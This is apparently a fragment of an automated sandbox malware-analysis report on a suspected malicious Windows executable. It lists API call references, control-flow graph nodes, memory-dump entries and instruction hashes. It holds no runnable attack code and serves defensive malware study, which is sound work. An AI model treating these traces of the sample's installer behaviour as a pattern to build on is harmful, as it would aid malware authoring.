                                                                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                    • API String ID: 1716503409-944333549
                                                                                                                                                                                                                                    • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                                                                                                                    • Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 761 4015c6-4015da call 402dab call 405ffc 766 401636-401639 761->766 767 4015dc-4015ef call 405f7e 761->767 769 401668-4022fb call 401423 766->769 770 40163b-40165a call 401423 call 406682 SetCurrentDirectoryW 766->770 774 4015f1-4015f4 767->774 775 401609-40160c call 405c30 767->775 785 402c2f-402c3e 769->785 770->785 789 401660-401663 770->789 774->775 778 4015f6-4015fd call 405c4d 774->778 782 401611-401613 775->782 778->775 794 4015ff-401602 call 405bd6 778->794 786 401615-40161a 782->786 787 40162c-401634 782->787 792 401629 786->792 793 40161c-401627 GetFileAttributesW 786->793 787->766 787->767 789->785 792->787 793->787 793->792 796 401607 794->796 796->782
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,75C53420,?,75C52EE0,00405DAE,?,75C53420,75C52EE0,"C:\Users\user\Desktop\2T10XBqS6g.exe"), ref: 0040600A
                                                                                                                                                                                                                                      • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                                                                                                                                                                                                      • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 0040161F
                                                                                                                                                                                                                                      • Part of subcall function 00405BD6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\eftermodnendes\ringeagt,?,00000000,?), ref: 00401652
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\eftermodnendes\ringeagt, xrefs: 00401645
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                                    • String ID: C:\Users\user\eftermodnendes\ringeagt
                                                                                                                                                                                                                                    • API String ID: 1892508949-2091667457
                                                                                                                                                                                                                                    • Opcode ID: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
                                                                                                                                                                                                                                    • Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                                                                                                                                                                                                    • Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                                                                                                                                                                                                    • Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                                                                                                                                                                                                    • Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                                                                                                                                                                                                    • Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                                                                                                                                                                                                    • Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                                                                                                                                                                                                    • Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                                                                                                                                                                                                    • Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                      • Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00119FB8,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FilePointer$CountTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1092082344-0
                                                                                                                                                                                                                                    • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                                                                                                                                                                                                    • Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?), ref: 00402108
                                                                                                                                                                                                                                      • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                                                                                                                                                                                      • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                                                                                                                                                                                      • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                                                                                                                                                                                      • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,?,?,?), ref: 00402119
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,?), ref: 00402196
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 334405425-0
                                                                                                                                                                                                                                    • Opcode ID: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
                                                                                                                                                                                                                                    • Instruction ID: d5d67dfdf4745362115819af7549d82072a8f7f049e0964222285d8f4f4a232d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
